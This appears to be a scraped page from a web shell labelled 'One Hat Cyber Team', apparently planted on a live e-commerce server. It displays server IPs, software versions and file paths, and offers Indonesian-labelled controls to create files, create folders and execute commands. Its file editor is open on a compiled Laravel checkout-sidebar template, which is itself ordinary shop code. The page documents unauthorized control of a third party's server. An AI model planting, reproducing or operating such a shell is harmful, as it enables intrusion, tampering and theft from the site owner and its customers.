One Hat Cyber Team
Your IP :
3.136.19.165
Server IP :
104.21.32.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
gftag.com
/
storage
/
framework
/
views
/
Edit File:
a3b4395a854a5461426ec135b794186e7ffbfc7b.php
<div class="col-xl-3 col-lg-4"> <aside class="sidebar"> <div class="padding-top-2x hidden-lg-up"></div> <!-- Order Summary Widget--> <section class="card widget widget-featured-posts widget-order-summary p-4"> <h3 class="widget-title"><?php echo e(__('Order Summary')); ?></h3> <?php $free_shipping = DB::table('shipping_services')->whereStatus(1)->whereIsCondition(1)->first() ?> <?php if($free_shipping): ?> <?php if($free_shipping->minimum_price >= $cart_total): ?> <p class="free-shippin-aa"><em><?php echo e(__('Free Shipping Ater order')); ?> <?php echo e(PriceHelper::setCurrencyPrice($free_shipping->minimum_price)); ?></em></p> <?php endif; ?> <?php endif; ?> <table class="table"> <tr> <td><?php echo e(__('Cart Subtotal')); ?>:</td> <td class="text-gray-dark"><?php echo e(PriceHelper::setCurrencyPrice($cart_total)); ?></td> </tr> <?php if($tax != 0): ?> <tr> <td><?php echo e(__('Estimated tax')); ?>:</td> <td class="text-gray-dark"><?php echo e(PriceHelper::setCurrencyPrice($tax)); ?></td> </tr> <?php endif; ?> <?php if(DB::table('states')->count() > 0): ?> <tr class="<?php echo e(Auth::check() && Auth::user()->state_id ? '' : 'd-none'); ?> set__state_price_tr"> <td><?php echo e(__('State tax')); ?>:</td> <td class="text-gray-dark set__state_price"><?php echo e(PriceHelper::setCurrencyPrice(Auth::check() && Auth::user()->state_id ? Auth::user()->state->price : 0)); ?></td> </tr> <?php endif; ?> <?php if($discount): ?> <tr> <td><?php echo e(__('Coupon discount')); ?>:</td> <td class="text-danger">- <?php echo e(PriceHelper::setCurrencyPrice($discount ? $discount['discount'] : 0)); ?></td> </tr> <?php endif; ?> <?php if($shipping): ?> <tr> <td><?php echo e(__('Shipping')); ?>:</td> <td class="text-gray-dark"><?php echo e(PriceHelper::setCurrencyPrice($shipping ? $shipping->price : 0)); ?></td> </tr> <?php endif; ?> <tr> <td class="text-lg text-primary"><?php echo e(__('Order total')); ?></td> <td class="text-lg text-primary grand_total_set"><?php echo e(PriceHelper::setCurrencyPrice($grand_total)); ?></td> </tr> </table> </section> <!-- Items in Cart Widget--> <section class="card widget widget-featured-posts widget-featured-products p-4"> <h3 class="widget-title"><?php echo e(__('Items In Your Cart')); ?></h3> <?php $__currentLoopData = $cart; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="entry"> <div class="entry-thumb"><a href="<?php echo e(route('front.product',$item['slug'])); ?>"><img src="<?php echo e(asset('assets/images/'.$item['photo'])); ?>" alt="Product"></a></div> <div class="entry-content"> <h4 class="entry-title"><a href="<?php echo e(route('front.product',$item['slug'])); ?>"> <?php echo e(strlen(strip_tags($item['name'])) > 45 ? substr(strip_tags($item['name']), 0, 45) . '...' : strip_tags($item['name'])); ?> </a></h4> <span class="entry-meta"><?php echo e($item['qty']); ?> x <?php echo e(PriceHelper::setCurrencyPrice($item['main_price'])); ?></span> <?php $__currentLoopData = $item['attribute']['option_name']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $optionkey => $option_name): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <span class="entry-meta"><b><?php echo e($option_name); ?></b> : <?php echo e(PriceHelper::setCurrencySign()); ?><?php echo e($item['attribute']['option_price'][$optionkey]); ?></span> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </section> </aside> </div> <?php /**PATH /home/shop/public_html/core/resources/views/includes/checkout_sitebar.blade.php ENDPATH**/ ?>
Simpan